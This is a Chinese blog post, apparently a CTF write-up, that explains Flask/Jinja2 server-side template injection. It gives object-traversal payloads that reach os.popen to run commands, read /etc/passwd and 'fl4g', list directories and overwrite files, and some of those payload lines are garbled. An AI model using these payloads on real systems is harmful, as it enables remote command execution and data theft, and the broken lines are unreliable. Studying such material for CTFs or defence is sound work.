【SSTI】flask 模板注入最详解

最新推荐文章于 2024-04-13 23:59:20 发布
最新推荐文章于 2024-04-13 23:59:20 发布
阅读量2k 收藏 10
点赞数 3
分类专栏: CTF-web 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/124689862
版权

一、flask是用python编写的一个轻量web开发框架

二、flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。

三、flask基础知识:

1. __class__: 返回当前类(有字符串类,元组类,字典组等等)

所有的子类都有一个共同的父类object,如果没指定继承,默认父类是object

2. __mor__: 返回解析函数时,类的调用顺序,先调用str类,再调用object类,通过索引的方式__mor[1],就可返回object类。

3. __base__: 返回当前父类(以字符串的形式)或者__bases__以元组的形式返回所有父类(元组可以通过索引访问)

print('abc'.__class__.__bases__[0].__subclasses__())

print('abc'.__class__.__base__.__subclasses__())

这两者一样

4. __subclass__(): 返回当前类所有的子类,可通过索引的方式定位某一个子类。

结果会返回很多类,但是可以通过len() 来查看其长度,调用系统命令os.wrap.close类

import os
print('abc'.__class__.__mro__[1].__subclasses__().index(os._wrap_close))

print('abc'.__class__.mro__[1].__subclasses__()[1])

5. __init__(初始化方法),__globals__(访问全局变量,字典),通过popen,以及read方法来进行系统命令执行

print('abc'.__class__.__base__.subclasses__()[41].__init__.__globals__['os']('fl4g').read())

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

6. __builtins__下的open进行文件的读取:

{{''.__class__.__mro__[1].__subclasses__()[134].__init__.__globals__['__builtins__']['open']('1.txt').read())}}

7.通过write() 方式修改文件内容

{{''.__class__.__mro__[1].__subclasses__()[41].__init__.__globals__['__builtins__']['open']('1.txt','w').write('123456')}}

 __class__  返回类型所属的对象
__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__   返回该对象所继承的基类  // __base__和__mro__都是用来寻找基类的

__subclasses__   每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__  类的初始化方法
__globals__  对包含函数全局变量的字典的引用

例题: Web_python_template_injection

payload:

1 、获取字符串的类对象

''.__class__
<type 'str'>

2 、寻找基类

''.__class__.__mro__
(<type 'str'>, <type 'basestring'>, <type 'object'>)

3 、寻找可用引用

这里有个小细节,'__mro__[] '中括号里填谁其实区别都不大,这些基类引用的东西都一样。

 ''.__class__.__mro__[2].__subclasses__()

[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, 
<type 'member_descriptor'>, <type 'file'> ......]
//<type 'file'> 是第41个,所以索引为__subclasses__()[40];

从其中可以找到我们想要的 'os' 所在的 ' site._Printer '类,它在列表的第七十二位,即 '__subclasses__()[71]'。 

4、利用:

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

 

5、 从其中可以找到我们想要
的 `os` 所在的 `site._Printer` 类,它在列表的第七十二位,
即 `__subclasses__()[71]` 。

__subclasses__()[71].__init__.__globals__['os'].popen('命令行语句').read()

来 **调用服务器的控制台** **并显示** ,这下我们就可以随便用控制台输出了。

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

8、打开文件

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

 

菜菜zhao
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器时,即使没有创建任何变量或函数,还是会有很多函数可供使用,这些就是python的内建函数。 名称空间:从名称到对象的映射 1.内建名称空间:python自带名字,在解释器启动时产生,存放一些pytho
flask模板注入
qq_45951598的博客
02-04 2809
flask基础 sstiSSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念,通过与服务端模板的 输入输出 交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的 因为flask使用Jinja2渲染引擎,可以在前端通过{{}}的形式使用变量或者{% %}执行python语句,存在注入的可能(不懂的话先去看flask!) 因为flask是用的python语言,所以python中的一些内置函数可以在flask中被
ssti模版注入(看完就会了),2024年最新音视频时代你还不会NDK开发
最新发布
2401_83947105的博客
04-13 888
_class__ 类的一个内置属性,表示实例对象的类。__base__ 类型对象的直接基类__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases____mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
flask模板注入(ssti),一篇就够了
热门推荐
qq_59950255的博客
03-02 1万+
1.什么是flask? flask是用python编写的一个轻量web开发框架 2.ssti成因 flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入 本地演示(需要自行安装flask,requests模块) 通过输入参数key可以进行简单的渲染,创造新的网页 当我们把render_template 换成render_template_string后,并对参数不进行处理 看看结果 代码执.
PythonFlask模板注入从0到1
Elite的博客
04-27 1611
flask是目前python主流的一个web微框架,通过flask框架我们可以利用python语言搭建起web服务
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5711
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF_Web:从0学习Flask模板注入SSTI
AFCC_的博客(Web_Dog)
08-30 3200
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
tplmap.zip
07-26
此工具类似于sqlmap,用于ssti漏洞,可一键进行模板注入。啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 。。。。。。。。。。。。。。。。。。。。。。。
CTF技巧_Web——基于Flask的Jinja2模板SSTI
Ho1aAs‘s Blog
10-05 1069
文章目录一、SSTI二、解题完 一、SSTI SSTI(Server Side Template Injection) 服务端模板注入 服务器模板中拼接了恶意用户输入导致各种漏洞 二、解题 打开某环境,发现GET请求参数显示在HTML页面之中,并且暗示了????(Python) 令name={{config}},发现存在sstiPython环境下,.__class__获取对应实例的类,.__mro__获取当前对象的所有继承类 例如,测试空字符串得到object父类 得到所有类的父类object后
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2597
Flask SSTI漏洞介绍及利用
Flask(Jinja2)服务端模板注入漏洞(SSTI)整理
qq_46145027的博客
04-19 1239
整理一下Flask框架下的SSTI漏洞相关知识
ssti--flask模块
m0_67467924的博客
05-29 259
构造payload:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()模板的作用是使用静态的页面html展示动态的内容。模板其实是一个响应文本的文件,其中变量表示动态部分,告诉模板引擎具体的值需要从使用的数据中获取,使用真实值替换变量,得到字符串的过程被称为渲染。可以使用如下模块控制语句查找,子类的初始化方法中的全局变量里是否存在os,如果有os,就返回当前模板中列表的下标。
SSTI模块注入SSTI+Flask+Python(中):漏洞利用
07-25 890
SSTI】漏洞利用
Flask-SSTI注入
qq_51922767的博客
09-28 1819
一.概述 SSTI即服务端模板注入,是指用户输入的参数被服务端当成模板语言进行了渲染,从而导致代码执行。 1.Flask Flask是一个基于python开发的web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个web应用程序。这个wdb应用程序可以使一些 web 页面、博客、wiki或商业网站。 Flask 属于微框架(micro-framework)这一类别,微架构通常是很小的不依赖于外部库的框架。这既有优点也有缺点,优点是框架很轻量,更新时依赖少,并且专注安全方面的 bug,缺
flask模版注入笔记
朋克归零膏的博客
09-05 155
[flask] simple_ssti
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面返回给浏览器。在SSTI攻击中,恶意注入的有效载荷可以是任意的模板代码,其目的是执行非法操作或者获取敏感信息。 关于SSTI模板注入的payload,这取决于模板引擎的类型和具体的注入点。不同的模板引擎可能具有不同的语法和功能,因此payload的编写也会有所差异。一般来说,payload可以包括以下内容: 1. 利用模板语法执行系统命令,例如使用`${{7*7}}`来执行简单的算术运算。 2. 通过访问对象的属性和方法来获取敏感信息,例如`{{config.items()}}`来获取应用程序的配置信息。 3. 利用模板语法实现循环、条件语句等控制流程,例如使用`{% for i in range(10) %}...{% endfor %}`来进行循环操作。 4. 调用模板引擎提供的特殊函数和过滤器,例如使用`{{7|safe}}`来禁用自动转义,或者使用`{{user.name|escape}}`来对用户输入进行转义。 请注意,在实际应用中进行SSTI攻击是非法的行为,我强烈建议您不要尝试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值